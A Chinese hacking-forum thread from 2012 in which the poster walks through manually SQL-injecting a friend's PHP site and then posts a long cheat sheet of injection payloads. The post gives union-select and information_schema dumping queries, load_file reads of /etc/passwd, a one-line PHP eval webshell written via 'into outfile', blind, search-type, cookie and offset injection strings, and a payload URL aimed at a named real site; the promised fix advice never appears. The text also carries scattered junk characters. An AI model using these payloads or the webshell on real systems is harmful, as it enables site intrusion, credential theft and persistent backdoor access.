找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2706|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~+ J2 E  ?6 R# Y( D: q
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?& c: c: r! O7 y* W( C  h6 ^
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。. W, l7 o7 g! j0 M: B: H4 A! z' @
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)4 ]+ ~; n$ A# T9 I* y- U: r  l
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
: ~6 b- `0 {' [% q这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:- H( J1 j/ Y/ K' H* T
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
, a' s& q6 [/ t! R$ `3 ?/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
  B# H5 p. V3 C) h% v$ q/ b* G                        
- |" C$ i7 n: A* b! ?$ n1 O2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,0 `4 O) z5 T8 q$ F7 J4 r2 r& y
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
. {- y9 e7 p7 E3 a  D4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
7 L8 \$ x7 D; w( o6 @5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。5 H6 I- G: x! r5 I
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,$ v9 }- |/ _1 p& c
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
& ^( j+ h. j; N# {* z( U我就用的是第二个思路,0 x8 P) w0 B6 _( ?
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  $ {# R) B! ]$ z! e7 X5 x/ b) R
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
" q7 a$ X4 W( R" X+ _! s+ y4 m: P提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
- W) j$ b, B. P注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。$ V) L/ H1 A/ w0 N; l  p, @
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
. Y. D) b# f$ F$ I- ^. h0 b6 |是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....+ e3 X; f8 q- x# e" R5 w; X9 K
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
' I, v: u/ S6 U) ^( q然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
# D2 k: N. G! ~2 _3 X& g3 _% o调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限....../ `) i. R& w$ `% F3 k9 ~+ F
下面是一些很普遍注入方式资料:# k/ y1 a/ O5 M; u3 j
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='% e- x$ R9 u/ N5 T/ \) G
拆半法! z. d' {! P5 [8 \
######################################
; L2 {1 X+ [: A0 u$ dand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
8 M' j: F' f+ _' rand exists (select * from admin)& ?1 g1 X9 o) w
and exists(select id from admin), m0 o$ n3 R+ d0 |
and exists(select id from admin where id=1)) \. I  |: ]8 f/ q6 M3 Q  P
and exists(select id from admin where id>1)
7 v; w$ K3 D, V6 K8 j2 v然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 ; u5 o$ ?# @3 C' I
and exists (select username from admin)
- W% r  K! u4 B4 O3 L& ]" }# S9 \! wand exists (select password from admin)
" p- I5 M/ ]. O. T  b) Nand exists (select id from admin where len(username)<10 and id=1)
% Q$ M0 r. }8 B  X& Aand exists (select id from admin where len(username)>5 and id=1)
" q! |  C1 n  cand exists (select id from admin where len(username)=6 and id=1)! Y& s4 h  m4 r/ j& z0 E  `
and exists (select id from admin where len(password)<10 and id=1); E! q; v$ ?) y& f: N
and exists (select id from admin where len(password)>5 and id=1)
, ?% ^% `# U. G, e! Kand exists (select id from admin where len(password)=7 and id=1)0 e+ P' h# F. J5 _7 y
and (select top 1 asc(mid(username,1,1)) from admin)=97
9 I. K' \: h9 I' K返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。2 T+ R& C( V( J* I9 V+ R
猜第二位把username,1,1改成username,2,1就可以了。# j2 @5 s# d' O9 f! {1 t
猜密码把username改成password就OK了
& |& o4 i& Q& s9 H8 t# ]$ f##################################################7 u( ^( |; g$ {  Q/ g
搜索型注入/ [$ c1 t, w% S, I4 ]
##################################
: l& g' e* T; G0 P%' and 1=1 and '%'='2 Y' _! c6 J- {8 Q3 [
%' and exists (select * from admin) and '%'='
5 a# o! U$ M! ~5 d%' and exists(select id from admin where id=1) and '%'='
; `* W6 d/ ?& n%' and exists (select id from admin where len(username)<10 and id=1) and '%'='5 l9 n. C7 t* Z: T
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='9 i* D6 y+ q8 I; O; b+ F  ]
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='0 g, s) S/ C0 A, Y7 p
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='" @+ V% x. z3 F, B9 @4 r% A
对于MSSQL数据库,后面可以吧 and '%'='换成--
+ ]: ^6 q. t1 ]+ G, L. ]6 P还有一点搜索型注入也可以使用union语句。8 A$ \7 `$ {0 F% n6 C
########################################################" g; z/ N# F$ }% s, g
联合查询。: \( J; p' q) ^  j6 M6 {
#####################################
) t1 Q7 b3 O. `+ w4 |! s7 V: d' G8 torder by 103 B; C$ R( `$ _& r- a6 p( }
and 1=2 union select 1,2,3,4,5,6,7,8,9,10  M: {) d+ H1 Y7 h  T
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin+ o8 g4 v( `3 ^
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
: F9 p; r3 F8 }. v: z很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)0 Z$ e( e9 ^/ ]9 z2 D" q
###################################7 V2 Z  K& i) e7 V
cookie注入- X; ?, T2 _- f) }
###############################
: m$ O2 a3 D! r' q% ^http://www.******.com/shownews.asp?id=127: Q, V( I) u5 U
http://www.******.com/shownews.asp
9 O9 o& T3 @1 B, ialert(="id="+escape("127"));; X( m8 G0 W6 q9 g. D- o: S0 l9 C1 U
alert(="id="+escape("127 and 1=1"));
8 D1 c0 I4 P9 _alert(="id="+escape("127 order by 10"));$ `0 H. q& r; }/ i: T1 w
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
; d% E, C1 E% L! }, Qalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
! ^$ w5 E& b5 E- X! ]这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
% F# v7 \: G* U% O/ E! K###################################; I  ]5 y6 ^8 Q1 S
偏移注入- Y. A$ I+ V1 w: y& V- X6 Y
###########################################################& J4 S7 n/ @$ q/ f
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin! w& ^; ~1 g, C! O" t" ^
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin4 D! T% Q' V3 u* j! `# R3 X
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)+ t5 }. H5 a* |- M6 c
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)1 L5 Y: J7 F, D
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)- m, a2 F' k) @/ C
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)& U  `' ^/ Z7 s# c7 ~1 f3 O$ A5 B
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
+ M9 r$ @3 A% O% }* za.id=d.id)
- d+ {+ ~; A/ G% p: n! p) A# Vand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)# L# C& d2 z, W) B
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) : A( Y4 h. n( ]
  
/ b4 ~5 M0 H' U. f============================================================================================================
3 n% h; B' n9 H8 F1.判断版本
, s; x2 Q2 L+ Wand ord(mid(version(),1,1))>514 c9 C9 W: T9 L$ _
返回正常,说明大于4.0版本,支持ounion查询
# k) Z: `& T0 E* s' C$ V* F9 O2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解+ ]3 p5 c$ s+ F! w4 G2 |$ X
and 2=4 union select 1,2,3,4,5,6,7,8,9--
1 I7 w5 K: f- p8 [3.查看数据库版本及当前用户,
$ n4 U# |; p: |0 U; _; R7 \/ R  Y' {1 Kand 2=4 union select 1,user(),version(),4,5,6,7,8,9--
! c' P/ S% [5 `5 \! C9 M数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,* V, `! g& U: V2 ]
4.判断有没有写权限; d4 P6 B9 t# u' R8 ?4 W7 z: f
and (select count(*) from MySQL.user)>0--
1 g7 |% m. N( O/ N1 m5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,11 X/ I1 j: {; e' c! S/ H
用不了这个命令,就学习土耳其黑客手法,如下
4 {8 F9 p4 ~0 Vand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
/ W! G; Y0 O: ]7 {; W8 K9 i6.爆表,爆库
5 }+ g1 z' s: v5 w( K6 sand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
, f6 v& c6 Y" K! H: M. k7.爆列名,爆表
* C/ p6 ^# z% |% z; i. nand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--9 n- j/ L% p( {" j* @
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
1 y* f3 {. b: `# Jand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
6 E8 q& }) F, v2 x2 e6 P. |+ b9.爆字段内容8 b/ x2 |. S. E- t0 V+ M
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
& ~2 R) U4 o1 `& ?- u# S; bhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表